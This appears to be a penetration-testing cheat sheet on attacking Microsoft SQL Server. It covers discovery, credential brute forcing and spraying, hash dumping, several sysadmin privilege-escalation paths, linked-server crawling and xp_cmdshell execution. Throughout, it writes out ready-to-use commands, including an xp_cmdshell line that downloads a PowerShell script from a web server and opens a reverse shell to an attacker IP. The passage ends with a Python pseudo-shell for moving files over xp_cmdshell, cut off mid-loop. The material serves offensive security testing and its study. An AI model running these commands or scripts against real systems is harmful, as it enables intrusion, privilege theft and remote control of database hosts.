PowerUpSQL is a PowerShell framework that implement cmdlets to discover, enumerate, and exploit SQL server instances. A number of usage of the PowerUpSQL PowerShell cmdlets presented in this note are inspired from the PowerUpSQL Cheat Sheet.
PowerUpSQL can be installed / imported in a number of ways:
# Permanently installs the framework from the PowerShell Gallery on the local system (requires local administrative privileges).Install-Module-NamePowerUpSQL# Imports the module in the current PowerShell session (to be executed in the project directory).Import-ModulePowerUpSQL.psd1# Inject the PowerShell script in memory (for the current PowerShell session only).IEX (Get-Content -RawPowerUpSQL.ps1)IEX(New-ObjectSystem.Net.WebClient).DownloadString("http://<WEBSERVER_IP>/PowerUpSQL.ps1")IEX(New-ObjectSystem.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")
MSSQL instances discovery
Through network scans
nmap can be used to scan the network for exposed MSSQL instances:
nmap-v-p1433-sV-sC-oAnmap_mssql<RANGE|CIDR>
On the current subnet broadcast domain
The PowerUpSQL's Get-SQLInstanceBroadcast PowerShell cmdlet can be used to discover MSSQL instances on the current local network subnet broadcast domain using the System.Data.Sql.SqlDataSourceEnumerator class (and an UPD broadcast request).
# -UDPPing: if set, additional information will be retrieved through a direct UDP request to the SQL Server Browser service of the discovered instances.Get-SQLInstanceBroadcast [-UDPPing] -Verbose
Using Active Directory credentials
If Active Directory domain credentials are known, a list of the domain service accounts referencing in their ServicePrincipalName (SPN) a MSSQL service can be requested in order to identify the MSSQL instances, that make use of the Kerberos authentication protocol, within the domain. As the SPN for service accounts follow the naming convention <SERVICE>/<HOST>, SPN starting with MSSQL are linked to SQL Server instances.
The PowerShell cmdlets Get-ADUser, of the Active Directory module for PowerShell and Get-SQLInstanceDomain, of the PowerUpSQL suite, can be used to conduct the search:
# Lists the SamAccountName and SPN of accounts whose SPN contains "MSSQL*".Get-ADObject-Filter { servicePrincipalName -like "*MSSQL*" } -Properties servicePrincipalName |Select-ObjectSamAccountName,servicePrincipalName# Extracts the hostname referenced in the SPNs containing "MSSQL*".Get-ADObject-Filter { servicePrincipalName -like "MSSQL*" } -Properties servicePrincipalName |Select-Expand servicePrincipalName |Where { $_ -like "MSSQL*" } |ForEach { $_.split('/')[1] }# Uses the current security context or the specified credentials to enumerate the SQL servers of the AD domain (Service Principal Name matching "MSSQL*").Get-SQLInstanceDomain-Verboserunas /noprofile /netonly /user:<DOMAIN>\<USERNAME> powershell.exeGet-SQLInstanceDomain-Verbose-DomainController<DC_IP>-Username<DOMAIN>\<USERNAME>-password <PASSWORD>
Through the SQL Server Browser service (in black box)
The nmapMSSQL-info.nse script attempts to determine configuration and version information from SQL Server instances. The script will first gather information by querying the SQL Server Browser service (that runs by default on UDP port 1434 and provides imprecise version information) and then sending a probe to the instance to conduct response packet analysis.
The metasploitauxiliary/scanner/mssql/mssql_ping module attempts to retrieve similar information:
msf>useauxiliary/scanner/mssql/mssql_ping
Authentication weaknesses
Empty password
Whenever targeting a large number of MSSQL services, the nmap nse script MSSQL-empty-password.nse can be used to quickly try to connect using the sa account and a blank password:
The Metasploit's auxiliary/scanner/mssql/mssql_login module and patator can be used to brute force credentials for the service.
patatormssql_loginhost=<IP>user=FILE0password=FILE10=<WORDLIST_USER>1=<WORDLIST_PASSWORD>-xignore:fgrep='Login failed for user'# The `BLANK_PASSWORDS` option is worth setting to "true".msf>useauxiliary/scanner/mssql/mssql_login
Alternatively, PowerUpSQL's Get-SQLServerLoginDefaultPw PowerShell cmdlet can be used to test if the targeted SQL Server instance(s) are configured to accept (50+) known default passwords:
Get-SQLServerLoginDefaultPw -Verbose -Instance '<INSTANCE>'
# Enumerates the SQL servers of the AD domain (Service Principal Name matching "MSSQL*") and attempt the bruteforce of default credentials.
Get-SQLInstanceDomain | Get-SQLServerLoginDefaultPw -Verbose
Get-SQLInstanceDomain -DomainController <DC_IP> -Username <DOMAIN>\<USERNAME> -Password <PASSWORD> | Get-SQLServerLoginDefaultPw -Verbose
Authentication spraying
A combination of the PowerUpSQL's Get-SQLInstanceDomain and Get-SQLConnectionTestThreaded PowerShell cmdlets can be used to:
first enumerate the SQL Server instances of an Active Directory domain
then attempt authentication using the current security context or the specified (local or windows) credentials on the discovered instances.
The Get-SQLInstanceDomain cmdlet can be replaced by the Get-SQLInstanceBroadcast cmdlet to attempt spraying over the SQL server instances of the local subnet.
# Enumerates the SQL server instances and attempt an authentication using the specified credentials.Get-SQLInstanceDomain-Verbose|Get-SQLConnectionTestThreaded-Verbose-Threads<15|THREAD_NUMBER> -username<USERNAME>-password<PASSWORD>|Where-Object{$_.Status-like"Accessible"}# Enumerates the SQL server instances and attempt an authentication using the current security context.Get-SQLInstanceDomain-Verbose|Get-SQLConnectionTestThreaded-Verbose-Threads<15|THREAD_NUMBER> |Where-Object{$_.Status-like"Accessible"}# Enumerates the SQL server instances and attempt an authentication using the specified domain credentials.runas/noprofile/netonly/user:<DOMAIN>\<USERNAME>powershell.exeGet-SQLInstanceDomain-Verbose-Username'<DOMAIN>\<USERNAME>'-Password'<PASSWORD>'-DomainController<DC_IP>|Get-SQLConnectionTestThreaded-Verbose-Threads<15|THREAD_NUMBER>
Information gathering and data retrieval
Interactive command line MSSQL clients
The sqsh Linux utility as well as the impacket Python script mssqlclient.py can be used to make queries to the database:
sqsh-U<USERNAME>-P<PASSWORD>-S<IP>:<PORT># -db is optional and defaults to "None"mssqlclient.py [-db <DB_NAME>]<DOMAIN|WORKGROUP>/<USERNAME>:<PASSWORD>@<HOSTNAME |IP># Windows authentication using the provided credentialsmssqlclient.py-windows-auth-db<DB_NAME><DOMAIN|WORKGROUP>/<USERNAME>:<PASSWORD>@<HOSTNAME |IP># Kerberos authenticationmssqlclient.py-k-dc-ip<DC_IP>-db<DB_NAME><DOMAIN|WORKGROUP>/<USERNAME>:<PASSWORD>@<HOSTNAME |IP>
Graphical user interface MSSQL clients
The DBeaver GUI tool can be used to simply access the database content through a graphical interface without the need to know the underlying MSSQL query syntax.
SELECT name, create_date, modify_date, type_desc, authentication_type_desc FROM sys.database_principals ORDER BY create_date DESC
Users' passwords
Using sqlmap:
sqlmap -D master -T sys.sql_logins --dump [...]
Current database
SELECT DB_NAME()
Databases
SELECT name FROM master.sys.databases
List tables of the specified database
SELECT TABLE_NAME FROM [<DATABASE>].INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'
List columns of the specified table
SELECT COLUMN_NAME FROM [<DATABASE>].INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = '<TABLE>' ORDER BY ORDINAL_POSITION
Select all data from the specified table
SELECT * FROM <TABLE>SELECT * FROM [<DATABSE>].<. | dbo | SCHEMA>.<TABLE>
Dump hashes
If provided with an user credentials of appropriate DB privileges, the nmapNSE script MSSQL-dump-hashes.nse can be used to dump the password hashes from an MSSQL instance in a format suitable for cracking by tools such as John-the-ripper / hashcat.
SELECT <...> INTO OUTFILE '\\<HOSTNAME>\<SMB_SHARE>\<OUTPUT_FILE>'
Privileges escalation
MSSQL server-level and database-level roles overview
MSSQL provides a roles mechanism which, similarly to groups in the Microsoft Windows operating system, makes use of security principals that group other principals and define server-wide or database-wide permissions. Permissions are the rights to access and modify the service configuration and databases objects.
Server roles have a server-wide scope while database role are database-wide in their permissions scope.
There are two types of MSSQL roles:
fixed roles, that have a fixed and defined set of permissions
user-defined roles, that can be manually created and assigned permissions
The following table shows the fixed-server roles and their capabilities:
Fixed-server role name
Description
sysadmin
Encompasses all other roles and can perform any activity in the server.
serveradmin
Can change server-wide configuration options and shut down the server. serveradmin can activate and make use of xp_cmdshell.
securityadmin
Manage logins and is granted the ALTER ANY LOGIN permission which allows GRANT, DENY, and REVOKE operations on server-level permissions and database-level permissions (for the database the user granted the role has access to). While securityadmin can not assign user roles (such as sysadmin or serveradmin), assigning the CONTROL SERVER permission can result in privileges escalation to sysadmin (process detailed below).
processadmin
Can end processes that are running in an instance of SQL Server.
setupadmin
Can add and remove linked servers by using Transact-SQL statements.
bulkadmin
Can run the BULK INSERT statement.
diskadmin
Manage disk files
dbcreator
Can create, alter, drop, and restore any database
public
Every SQL Server login belongs to the public server role. When a server principal has not been granted or denied specific permissions on a securable object, the user inherits the permissions granted to public on that object. public is implemented differently than other roles, and permissions can be granted, denied, or revoked from the role.
The following table shows the fixed-database roles and their capabilities:
Fixed-database role name
Description
db_owner
Can perform all configuration and maintenance activities on the database and can also drop the database.
db_securityadmin
Can modify role membership for custom roles only, create users without logins, and manage permissions.
db_accessadmin
Can add or remove access to the database for Windows logins, Windows groups, and SQL Server logins.
db_backupoperator
Can back up the database.
db_ddladmin
Can run any Data Definition Language (DDL) command in a database.
db_datawriter
Can add, delete, or change data in all user tables.
db_datareader
Can read all data from all user tables.
db_denydatawriter
Can not add, modify, or delete any data in the user tables within a database.
db_denydatareader
Can not read any data in the user tables within a database.
Enumerate user's roles and permissions
-- Returns the name of the database user name / current security context.SELECT USER_NAME()SELECT CURRENT_USER-- Returns the login identification name, DOMAIN\USERNAME for Windows authentication USERNAME for SQL Server Authentication.-- If the user name and login name are different, SYSTEM_USER returns the login name.SELECT SYSTEM_USERSELECT loginame FROM master..sysprocesses WHERE spid = @@SPID-- Is the current user sysadmin or serveradmin.SELECT IS_SRVROLEMEMBER('sysadmin')SELECT IS_SRVROLEMEMBER('serveradmin')-- Is the specified user (login name) sysadmin or serveradmin.SELECT IS_SRVROLEMEMBER('sysadmin', '<USERNAME>')SELECT IS_SRVROLEMEMBER('serveradmin', '<USERNAME>')-- Lists the specified user's fixed-database roles.SELECT u.name, r.name FROM sys.database_role_members AS m INNER JOIN sys.database_principals AS r ON m.role_principal_id = r.principal_id INNER JOIN sys.database_principals AS u ON u.principal_id = m.member_principal_id WHERE u.name ='<USERNAME>';-- Lists the current users permissions.SELECT entity_name, permission_name FROM sys.fn_my_permissions(NULL, NULL)-- Lists the users with the sysadmin role.exec sp_helpsrvrolemember @srvrolename='sysadmin'SELECT 'Name'= sp.NAME,sp.is_disabled AS [Is_disabled] FROM sys.server_role_members rm inner join sys.server_principals sp on rm.member_principal_id = sp.principal_id WHERE rm.role_principal_id = SUSER_ID('sysadmin')-- Lists the users with the sysadmin role or "Control Server" permissionSELECT DISTINCT p.name AS [loginname], p.type, p.type_desc, p.is_disabled, s.sysadmin, CONVERT(VARCHAR(10), p.create_date ,101) AS [created],CONVERT(VARCHAR(10), p.modify_date, 101) AS [update] FROM sys.server_principals p JOIN sys.syslogins s ON p.sid = s.sid JOIN sys.server_permissions sp ON p.principal_id = sp.grantee_principal_id WHERE p.type_desc IN ('SQL_LOGIN', 'WINDOWS_LOGIN', 'WINDOWS_GROUP') AND p.name NOT LIKE '##%' AND (s.sysadmin = 1 OR sp.permission_name = 'CONTROL SERVER') ORDER BY p.name
-- Lists the users' fixed-database role(s) in the current database.SELECT db_name(), r.[name], p.[name] FROM sys.database_role_members m JOIN sys.database_principals r ON m.role_principal_id = r.principal_id JOIN sys.database_principals p ON m.member_principal_id = p.principal_id;-- Maps the fixed-database role(s) to the user(s). Taken from https://docs.microsoft.com/en-us/sql/relational-databases/system-catalog-views/sys-database-role-members-transact-sql?view=sql-server-ver15#exampleSELECT DP1.name AS DatabaseRoleName, isnull (DP2.name, 'No members') AS DatabaseUserName FROM sys.database_role_members AS DRM RIGHT OUTER JOIN sys.database_principals AS DP1 ON DRM.role_principal_id = DP1.principal_id LEFT OUTER JOIN sys.database_principals AS DP2 ON DRM.member_principal_id = DP2.principal_id WHERE DP1.type ='R' ORDER BY DP1.name;
IMPERSONATE permission
The IMPERSONATE permission allows for the context switching of a SQL statement by impersonating another login or database user. An user granted the IMPERSONATE permission can thus elevate its privileges to the ones of the user he is allowed to impersonate, resulting in a potential elevation of privileges.
This permission is implied for the sysadmin role for all databases, and the db_owner role members in databases that they own. Indeed, impersonation of a login (EXECUTE AS LOGIN) grants server level permissions (of the impersonated login) while the impersonation of an user (EXECUTE AS USER) only grant permissions at the database level.
The following queries can be used to exploit the IMPERSONATE permission:
-- List the SQL Server logins that can be impersonated by the current userSELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name ='IMPERSONATE'-- Swith the execution context of the session to the specified login. Requires the IMPERSONATE permission on the specified login.EXECUTE AS LOGIN ='<LOGIN>';EXECUTE AS LOGIN ='<DOMAIN>\\<LOGIN>';-- Swith the execution context in the database to the specified user. Requires the IMPERSONATE permission on the specified user.EXECUTE AS USER ='<USER>';
The Metasploit's auxiliary/admin/mssql/mssql_escalate_execute_as module and the PowerShell cmdlet Invoke-SQLAuditPrivImpersonateLogin of the PowerUpSQL suite can be used to automate the impersonation of an user having the sysadmin role :
securityadmin role / "CONTROL SERVER" permission to sysadmin
The securityadmin role or the CONTROL SERVER permission can be exploited to gain sysadmin access.
Indeed the CONTROL SERVER permission can be used to grant the permission to impersonate an user with the sysadmin role, such as sa. While the securityadmin role can not assign user roles, the role can be used to create an account and assign it the CONTROL SERVER permission.
-- Is the current user securityadmin / has the "CONTROL SERVER" permission-- SELECT system_user; SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID;SELECT IS_SRVROLEMEMBER('securityadmin')SELECT HAS_PERMS_BY_NAME(null, null, 'CONTROL SERVER');-- List users with the securityadmin roleexec sp_helpsrvrolemember @srvrolename='securityadmin'SELECT 'Name'= sp.NAME,sp.is_disabled AS [Is_disabled] FROM sys.server_role_members rm inner join sys.server_principals sp on rm.member_principal_id = sp.principal_id WHERE rm.role_principal_id = SUSER_ID('securityadmin')-- List users with the "CONTROL SERVER" permissionSELECT login.name, perm.permission_name, perm.state_desc FROM sys.server_permissions perm JOIN sys.server_principals loginON perm.grantee_principal_id = login.principal_id WHERE permission_name ='CONTROL SERVER';-- SQL query to create an userCREATE LOGIN [<USERNAME>] WITH PASSWORD ='<PASSWORD>';GO-- From the user with the securityadmin roleGRANT CONTROL SERVER TO [<USERNAME>];GO-- From user with the "CONTROL SERVER" permissionGRANT IMPERSONATE ON LOGIN::<sa | USER_SYSADMIN> TO [<USERNAME>];GO
TRUSTWORTHY database db_owner role to sysadmin
Having the db_owner role in a TRUSTWORTHY database (a database with the TRUSTWORTHY property set to true) owned by a user that has the sysadmin role can be leveraged to escalate privileges to sysadmin.
Indeed a stored procedure, declared by a database owner, that is set to EXECUTE AS OWNER will, during execution, acquire the server level permissions of the actual database owner if the database's TRUSTWORTHY property is set. Thus, if a database is TRUSTWORTHY and owned by an user having the sysadmin role, any user having the db_owner role on the database can elevate its privileges to sysadmin.
-- List the value of the property TRUSTWORTHY property for all databasesSELECT name, is_trustworthy_on from sys.databases-- Get the owner of the specified databaseSELECT nameAS'Database', suser_sname(owner_sid) AS'Creator'from sys.databases WHERE name='<DATABASE_NAME>';-- Automates the search of trustworthy databases owned by a sysadminSELECT d.name AS DATABASENAME FROM sys.server_principals r INNER JOIN sys.server_role_members m ON r.principal_id = m.role_principal_id INNER JOIN sys.server_principals p ON p.principal_id = m.member_principal_id inner join sys.databases d onsuser_sname(d.owner_sid) = p.name WHERE is_trustworthy_on =1 AND d.name NOT IN ('MSDB') and r.type ='R'and r.name =N'sysadmin'-- Has the current user the db_owner role on the databaseUSE <DB_NAME>SELECT IS_MEMBER('db_owner')-- Create the stored procedure to add the sysadmin role to the specified userCREATE PROCEDURE sp_elevate_user WITH EXECUTE AS OWNER ASbegin EXEC sp_addsrvrolemember '<USERNAME>','sysadmin'end;GO-- Execute the stored procedure to elevate privilegessp_elevate_userGO-- Remove the stored procedureDROP PROC sp_elevate_user;GO
The Metasploit's auxiliary/admin/mssql/mssql_escalate_dbowner module and the PowerShell cmdlet Invoke-SqlServer-Escalate-DbOwner can be used to automate the process:
msf5> useauxiliary/admin/mssql/mssql_escalate_dbowner# Grant user used to login the `sysadmin` roleInvoke-SqlServer-Escalate-DbOwner-SqlServerInstance<HOSTNAME|IP>\<INSTANCE> -SqlUser<USERNAME>-SqlPass<PASSWORD># Create a new user and grant him the `sysadmin` roleInvoke-SqlServer-Escalate-DbOwner-SqlServerInstance<HOSTNAME|IP>\<INSTANCE> -SqlUser<USERNAME>-SqlPass<PASSWORD>-newuser<NEW_USERNAME>-newPass<NEW_PASSWORD>
The PowerShell cmdlets Invoke-SQLAudit and Invoke-SQLEscalatePriv, of the PowerUpSQL suite, can be used to detect and exploit path that can be leveraged to escalate privileges.
The Invoke-SQLEscalatePriv cmdlet will call the Invoke-SQLAudit cmdlet with the -Exploit flag to detect and automatically exploit the following misconfigurations / vulnerabilities in order to escalate to the sysadmin role:
IMPERSONATE permission
TRUSTWORTHY database db_owner
CREATE PROCEDURE permission
The cmdlets will moreover conduct various other checks: availability of the stored procedures xpdirtree and xp_fileexist for the specified user, configuration of server database links, etc.
Windows local administrator privileges to SQL Server sysadmin
Among other techniques, such as dumping the LSA secrets, the impersonation of an MSSQL service account can be used to access an MSSQL service as sysadmin after obtaining local administrator privileges on a Windows host.
PowerUpSQL's Invoke-SQLImpersonateService can be used to conduct the impersonation in order to run futher PowerUpSQL as sysadmin:
# IEX(New-Object System.Net.WebClient).DownloadString("https://<WEBSERVER_IP>:<WEBSERVER_PORT>/PowerUpSQL.ps1")Invoke-SQLImpersonateService-Verbose-Instance<HOSTNAME|IP>\<INSTANCE>Get-SQLServerInfo-Verbose-Instance<HOSTNAME|IP>\<INSTANCE># CurrentLogin : NT Service\MSSQL$<INSTANCE>
Linked servers
Overview
The linked server mechanism allows for access to others Object Linking and Embedding, Database (OLE DB) data sources outside of the present MSSQL instance. The mechanism can be used at the database level to connect to and query a variety of data stores including, but not limited to:
SQL Servers
Oracle Servers
Text Files
Excel Files
A server link can be configured to use the current security context of the login, a specified Windows or MSSQL login of the linked server, or be disabled if no credentials are provided. By default, any login that belongs to the PUBLIC role can query a database through a server link and may thus use the configured credentials (if any).
Moreover, stored procedures, such as xp_cmdshell, can be executed over a server link, according to the configured login roles and permissions. Note that outgoing RPC connections, RPC Out, need to be enabled on the link to conduct reconfiguration operations to enable xp_cmdshell on the linked instance.
Discovery and exploitation
The OPENQUERY and EXEC [...] AT functions can be used to execute SQL statements on the specified linked server. Note that the statement executed by OPENQUERY must return a value, so a SELECT 1; is needed for otherwise return less queries. Additionally, RPC Out must be enabled in order to use EXEC [...] AT statements.
SQL statements can be nested through the OPENQUERY and EXEC [...] AT functions. Thus, server links can be followed from server to server. To escape the single quote character, inside a string quoted with ', it should be written as ''.
-- List the linked serversSELECT srvname frommaster..sysservers-- Check if RPC Out is enabled for the specified linked serverEXEC ('master.dbo.sp_helpdb') AT [<HOSTNAME | IP>\<INSTANCE>]-- Basic login reconSELECT * FROM OPENQUERY("<HOSTNAME | IP>\<INSTANCE>", 'SELECT SYSTEM_USER')SELECT * FROM OPENQUERY("<HOSTNAME | IP>\<INSTANCE>", 'SELECT is_srvrolemember(''sysadmin'')')-- List linked servers configured of the specified linked serverSELECT * FROM OPENQUERY("<HOSTNAME | IP>\<INSTANCE>", 'SELECT srvname from master..sysservers')-- Nested queries for basic recon on the second MSSQL instanceSELECT * FROM OPENQUERY("<HOSTNAME1 | IP1>\<INSTANCE1>", 'SELECT * FROM OPENQUERY("<HOSTNAME2 | IP2>\<INSTANCE2>", ''SELECT is_srvrolemember(''''sysadmin'''')'')')EXEC ('EXEC (''SELECT is_srvrolemember(''''sysadmin'''')'') AT [<HOSTNAME2 | IP2>\<INSTANCE2>];') AT [<HOSTNAME1 | IP1>\<INSTANCE1>]-- Create an user and give it the sysadmin roleEXEC ('CREATE LOGIN <USERNAME> WITH PASSWORD = ''<PASSWORD>'';') AT [<HOSTNAME | IP>\<INSTANCE>]EXEC ('EXEC master.dbo.sp_addsrvrolemember ''<USERNAME>'',''sysadmin'';') AT [<HOSTNAME | IP>\<INSTANCE>]-- Nested in order to create the login on the second MSSQL instanceEXEC ('EXEC (''CREATE LOGIN <USERNAME> WITH PASSWORD = ''''<PASSWORD>'''''') AT [<HOSTNAME2 | IP2>\<INSTANCE2>];') AT [<HOSTNAME1 | IP1>\<INSTANCE1>]EXEC ('EXEC (''EXEC master.dbo.sp_addsrvrolemember ''''<USERNAME>'''',''''sysadmin'''''') AT [<HOSTNAME2 | IP2>\<INSTANCE2>];') AT [<HOSTNAME1 | IP1>\<INSTANCE1>]-- xp_cmdshellEXEC ('xp_cmdshell ''<CMD>''') AT [<HOSTNAME1 | IP1>\<INSTANCE1>]EXEC ('EXEC (''xp_cmdshell ''''<CMD>'''''') AT [<HOSTNAME2 | IP2>\<INSTANCE2>];') AT [<HOSTNAME1 | IP1>\<INSTANCE1>]SELECT * FROM OPENQUERY("[<HOSTNAME | IP>\<INSTANCE>]",'EXEC master..xp_cmdshell ''<CMD>''')-- SELECT 1 must be added if the command executed through xp_cmdshell does not return any resultSELECT * FROM OPENQUERY("[<HOSTNAME | IP>\<INSTANCE>]",'SELECT 1; EXEC master..xp_cmdshell ''<CMD>''')SELECT * FROM OPENQUERY("[<HOSTNAME1 | IP1>\<INSTANCE1>]", 'SELECT * FROM OPENQUERY("[<HOSTNAME2 | IP2>\<INSTANCE2>]", ''xp_cmdshell whoami;'')');
The PowerUpSQL's Get-SQLServerLinkCrawl PowerShell cmdlet can be used to automate the discovery and exploitation process detailed above:
# Lists and retrieves information (link name, is_data_access_enabled / is_rpc_out_enabled, etc.) on the database links of the specified instance.Get-SQLServerLink-Verbose-Instance"<INSTANCE>"# Recursively enumerates the database links of the specified instance (and displays if sysadmin privileges are granted on the linked instance(s)).Get-SqlServerLinkCrawl-Instance"<INSTANCE>"# Executes the given SQL query on all the database(s) linked to the specified instance.Get-SQLServerLinkCrawl-Instance"<INSTANCE>"-Query"<SELECT @@version | SQL_QUERY>"# Leverages sysadmin privileges on the linked databse to enable xp_cmdshell.Get-SQLServerLinkCrawl-Instance"<INSTANCE>"-Query'EXECUTE(''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT "<LINKED_INSTANCE>"'# Executes an operating system command using xp_cmdshell on all the linked database (requires sufficient privileges and xp_cmdshell to be enabled).Get-SQLServerLinkCrawl-Instance"<INSTANCE>"-Query'exec master..xp_cmdshell ''<OS_COMMAND>'''
Additionally, the Metasploit module exploit/windows/mssql/mssql_linkcrawler can be used to automatically and recursively crawl the configured server links and deploy payloads if the DEPLOY is set to True:
msf> use exploit/windows/mssql/mssql_linkcrawler
OS commands execution
xp_cmdshell procedure
The xp_cmdshell extended procedure can be used to execute system commands given that the account making the queries has sufficient privileges on the SQL service. The xp_cmdshell function is deactivated by default starting from SQL Server 2000 and upwards and needs to be activated. Its re activation requires elevated privileges.
As with any stored procedure, xp_cmdshell needs to be called through stacked queries.
Note that the Windows process spawned by xp_cmdshell has the same security rights as the SQL Server service account running the service.
xp_cmdshell activation
The following query can be used to manually activate it given the account used has sufficient privilege (sysadmin):
-- Checks if xp_cmdshell is enabled (config_value = 1).
EXEC sp_configure 'xp_cmdshell';
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1;
GO
-- To update the currently configured value for advanced options.
RECONFIGURE;
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1;
GO
-- To update the currently configured value for this feature.
RECONFIGURE;
GO
Operating system CMD commands can then be executed:
EXEC xp_cmdshell '<CMD>'
GO
The SQL queries above can be made using the sqsh Linux utility as well as the impacket Python script mssqlclient.py. The mssqlclient.py client integrates the enable_xp_cmdshell and xp_cmdshell commands to automatically enable xp_cmdshell and execute command through it.
In order to execute command through a system shell, the PowerShellNishang's Invoke-PowerShellTcp.ps1 can be used.
Once a web server hosting the PowerShell script and a listener are up and running, the following commands can be used to download and execute the script through the MSSQL service:
EXEC xp_cmdshell "powershell IEX (New-Object Net.WebClient).DownloadString('http://<WEBSERVER_IP>:<WEBSERVER_PORT>/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <Port>;"-- Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <Port> must be added at the end of the scriptEXEC xp_cmdshell "powershell IEX (New-Object Net.WebClient).DownloadString('http://<WEBSERVER_IP>:<WEBSERVER_PORT>/Invoke-PowerShellTcp.ps1')"
Metasploit
The Metasploit module exploit/windows/mssql/mssql_payload automates the tasks above to deploy a payload, such as a reverse meterpreter, on the server through the MSSQL service.
The module exploit/windows/mssql/mssql_payload_sqli works similarly and can be used through an SQL injection.
Standalone MSSQL shell for constrained environments
If outbound traffic (TCP, UDP, ICMP, etc.) is being blocked, the following Python script can be used as a pseudo shell by making use of xp_cmdshell and keeping track of the current working directory. The script also provides a way to upload / download files using multiple echo commands in order to write a base64-encoded file on the server and decoding it using the certutil utility.
#!/usr/bin/env python2from__future__import print_function# Author: Alamot# Download functionality: Qazeer# Use pymssql >= 1.0.3 (otherwise it doesn't work correctly)# To upload a file, type: UPLOAD local_path remote_path# e.g. UPLOAD myfile.txt C:\temp\myfile.txt# If you omit the remote_path it uploads the file on the current working folder.# To dowload a file from the remote host, type: DOWNLOAD remote_path [local_path]# e.g. DOWNLOAD myfile.txt# Or DOWNLOAD remotefile.txt /tmp/file.txt# Be aware that pymssql has some serious memory leak issues when the connection fails (see: https://github.com/pymssql/pymssql/issues/512).import _mssqlimport base64import ntpathimport osimport randomimport shleximport stringimport sysimport tqdmimport hashlibfrom io importopentry:input= raw_inputexceptNameError:passMSSQL_SERVER ='<IP>'MSSQL_USERNAME ='<USERNAME>'MSSQL_PASSWORD ='<PASSWORD>'BUFFER_SIZE =5*1024TIMEOUT =30defid_generator(size=12,chars=string.ascii_uppercase + string.digits):return''.join(random.choice(chars) for _ inrange(size))defprocess_result(mssql): username ="" computername ="" cwd ="" rows =list(mssql)for row in rows[:-3]: columns = row.keys()print(row[columns[-1]])iflen(rows)>=3: (username, computername) = rows[-3][rows[-3].keys()[-1]].split('|') cwd = rows[-2][rows[-3].keys()[-1]]return (username.rstrip(), computername.rstrip(), cwd.rstrip())defupload(mssql,stored_cwd,local_path,remote_path):print("Uploading "+local_path+" to "+remote_path) cmd ='type nul > "'+ remote_path +'.b64"' mssql.execute_query("EXEC xp_cmdshell '"+cmd+"'")withopen(local_path, 'rb')as f: data = f.read() md5sum = hashlib.md5(data).hexdigest() b64enc_data ="".join(base64.encodestring(data).split())print("Data length (b64-encoded): "+str(len(b64enc_data)/1024)+"KB")for i in tqdm.tqdm(range(0, len(b64enc_data), BUFFER_SIZE), unit_scale=BUFFER_SIZE/1024, unit="KB"): cmd ='echo '+b64enc_data[i:i+BUFFER_SIZE]+' >> "'+ remote_path +'.b64"' mssql.execute_query("EXEC xp_cmdshell '"+cmd+"'")#print("Remaining: "+str(len(b64enc_data)-i)) cmd ='certutil -decode "'+ remote_path +'.b64" "'+ remote_path +'"' mssql.execute_query("EXEC xp_cmdshell 'cd "+stored_cwd+" & "+cmd+" & echo %username%^|%COMPUTERNAME% & cd'")process_result(mssql) cmd ='certutil -hashfile "'+ remote_path +'" MD5' mssql.execute_query("EXEC xp_cmdshell 'cd "+stored_cwd+" & "+cmd+" & echo %username%^|%COMPUTERNAME% & cd'")if md5sum in [row[row.keys()[-1]].strip()for row in mssql if row[row.keys()[-1]]]:print("MD5 hashes match: "+ md5sum)else:print("ERROR! MD5 hashes do NOT match!")defdowload(mssql,stored_cwd,remote_path,local_path=""):try: remote_path = remote_path.replace('"', '').replace('\'', '')if local_path =="": local_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), ntpath.basename(remote_path))print("Downloading "+ remote_path +" to "+ local_path) tmp_filename ='%TEMP%\\'+id_generator()+".b64" cmd ='del "'+ tmp_filename +'"' mssql.execute_query("EXEC xp_cmdshell '"+ cmd +"'") cmd ='certutil -encode "'+ remote_path +'" "'+ tmp_filename +'"' mssql.execute_query("EXEC xp_cmdshell 'cd "+ stored_cwd +" & "+ cmd +" & echo %username%^|%COMPUTERNAME% & cd'") cmd ='type "'+ tmp_filename +'"' mssql.execute_query("EXEC xp_cmdshell 'cd "+ stored_cwd +" & "+ cmd +" & echo %username%^|%COMPUTERNAME% & cd'") certutil_result =list(mssql)if"CERTIFICATE-----"notinstr(certutil_result[0][0]):raiseException("ERROR! Encoding with Certutil failed!") file_b64 =""for row in certutil_result[1:-4]: columns =list(row) file_b64 += row[columns[-1]]withopen(local_path, 'wb')as f: data = base64.b64decode(file_b64, None) md5sum = hashlib.md5(data).hexdigest() f.write(data) tmp_filename ='%TEMP%\\'+ tmp_filename +".b64" cmd ='del "'+ tmp_filename +'"' mssql.execute_query("EXEC xp_cmdshell '"+ cmd +"'") cmd ='certutil -hashfile "'+ remote_path +'" MD5' mssql.execute_query("EXEC xp_cmdshell 'cd "+stored_cwd+" & "+cmd+" & echo %username%^|%COMPUTERNAME% & cd'")if md5sum in [row[row.keys()[-1]].strip()for row in mssql if row[row.keys()[-1]]]:print("MD5 hashes match: "+ md5sum)else:Exception("ERROR! MD5 hashes do NOT match!")return"echo *** DOWNLOAD PROCEDURE FINISHED ***"exceptExceptionas e:return"echo *** ERROR WHILE DOWNLOADING THE FILE: "+ e +" ***"defshell(): mssql =None stored_cwd =Nonetry: mssql = _mssql.connect(server=MSSQL_SERVER, user=MSSQL_USERNAME, password=MSSQL_PASSWORD)print("Successful login: "+MSSQL_USERNAME+"@"+MSSQL_SERVER)print("Trying to enable xp_cmdshell ...") mssql.execute_query("EXEC sp_configure 'show advanced options',1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell',1;RECONFIGURE") cmd ='echo %username%^|%COMPUTERNAME% & cd' mssql.execute_query("EXEC xp_cmdshell '"+cmd+"'") (username, computername, cwd) =process_result(mssql) stored_cwd = cwdwhileTrue: cmd =raw_input("CMD "+username+"@"+computername+" "+cwd+"> ").rstrip("\n").replace("'", "''")if cmd.lower()[0:4] =="exit": 